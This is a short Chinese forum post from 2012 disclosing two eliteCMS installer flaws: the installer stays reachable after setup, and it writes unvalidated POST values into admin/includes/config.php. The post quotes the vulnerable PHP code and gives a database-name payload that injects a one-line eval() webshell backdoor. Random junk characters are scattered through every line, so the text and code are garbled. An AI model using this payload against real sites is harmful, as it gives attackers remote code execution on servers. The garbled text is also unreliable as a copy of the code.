eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
2 B6 T% G7 u, Y' ]2 v
; Z" ~# J/ M m7 P" h" E* W另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
7 i# h# p, K, O: U5 j! y( X我们来看代码:9 Z0 i6 @) |* d0 s+ X$ Q
# s0 a8 b; |1 C) M' \" F...
0 d! f8 a: f$ qelseif ($_GET['step'] == "4") {$ j& ?) g. F: `* ], G: P
$file = "../admin/includes/config.php";
* J# Q/ U, B- z% i9 d8 J $write = "<?php\n";& d' C+ x Y7 L& T3 }; U
$write .= "/**\n";
; G: ~5 c. ?1 H $write .= "*\n";
. ^9 W' {. Q) Q& Z1 ` $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
0 d7 y5 F, \- h+ C4 r E...略...7 B3 e8 _& ?! c8 F
$write .= "*\n";- }& ~+ t' X/ f, K9 D" _
$write .= "*/\n";3 y7 |1 r" u& C; c5 e' F( {5 p
$write .= "\n";
@" m1 e7 y4 S6 Q# U) m $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";& L1 Y, ^9 u& ^0 l
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";, |/ m4 y. g+ \% w7 q- v
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
" K* N* M/ z& w* i $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";! ~7 ~( \, j$ B# h- ]3 S
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";* _7 `2 ~5 ^* ^" R
$write .= "if (!\$connection) {\n";
4 g2 w$ _% ^9 v# l $write .= " die(\"Database connection failed\" .mysql_error());\n";$ q a @: i. ]! E
$write .= " \n";
1 ] M8 o2 _6 a/ ? $write .= "} \n";
! e; W8 R& F8 k $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
5 B- M" F/ X( x $write .= "if (!\$db_select) {\n";9 N. k( S0 b- \" B; b3 K- G4 X% A
$write .= " die(\"Database select failed\" .mysql_error());\n";
" O* W2 W. N% w" J $write .= " \n";/ b4 t8 U9 V a3 P
$write .= "} \n";) x$ R5 T1 z' i3 A Y- |
$write .= "?>\n";
1 \! X( Z+ v \ F# P, M' r/ w
$writer = fopen($file, 'w');! i) T& Z$ e$ t1 Q+ c5 k/ A: k& H$ |
...
" t% P' Z. B. ^: f" T' q7 _' T 1 m8 S0 F3 e; N
在看代码:
: [- L& Q2 n0 j7 p% l ( }' m1 c9 y1 C% w
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
; o- {/ g3 }6 a; R. d) T( m$_SESSION['DB_NAME'] = $_POST['DB_NAME'];; ?1 X# e0 L- {8 V6 f, B) f
$_SESSION['DB_USER'] = $_POST['DB_USER'];7 v, ?& m5 u4 ^. g
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
- R! h" J0 r2 P3 M, w L8 L; O
" e& \- q+ b& `# r) E取值未作任何验证0 m8 a9 N2 f8 I( r; D' p( ^
如果将数据库名POST数据:
; I: G& J" R( V* F
4 B$ o2 f6 L4 S7 m: g( o"?><?php eval($_POST[c]);?><?php
! t+ j/ t4 Q8 A: M: I/ @ 2 C) V/ m& F6 p! b; Y
将导致一句话后门写入/admin/includes/config.php
% i' P* T: K4 l( V* ?3 f0 i4 k: U: ] |
发表于 2012-11-18 13:59:27
收藏
支持
反对